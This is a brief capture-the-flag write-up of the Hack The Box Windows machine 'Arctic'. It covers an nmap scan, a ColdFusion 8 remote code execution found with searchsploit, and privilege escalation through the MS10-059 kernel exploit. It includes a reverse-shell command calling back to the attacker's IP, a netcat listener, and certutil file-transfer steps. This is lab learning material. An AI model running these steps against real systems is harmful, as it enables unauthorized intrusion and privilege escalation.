HTB | Artic

This is a Windows box. You can find it here.

Skill Learned

  • Exploit modification (MS10-59)

NMAP

IP:10.10.10.11

nmap scan

Port 8500

Port 8500

Found Adobe ColdFusion Login

Adobe ColdFusion Login

Foothold/ shell

found RCE for Version 8

searchsploit

edit rhost, rport and lhost, lport and run the exploit.

shell

and we are in. Found user.txt

user.txt

Priv Esc

Copy winpeacers to the box

python3 -m http.server 80
certutil

and run the exe

running winpeasx64

not able to run the exe, might be AV is stopping us the run.

Let's copy powerUp.ps1

For some reason, PowerShell is not also working

Let's try windows-exploit-suggester

Copy the systeminfo output from the box and run the exploit

running windows-exploit-suggester

since MS10-59 is a kernel exploit let's try it first

Let's copy the exe to box

start the nc and run the exe

MS10-059.exe 10.10.14.14 1234
MS10-059.exe 10.10.14.14 1234
nc -nlvp 1234

Found the root.txt

root.txt

Last updated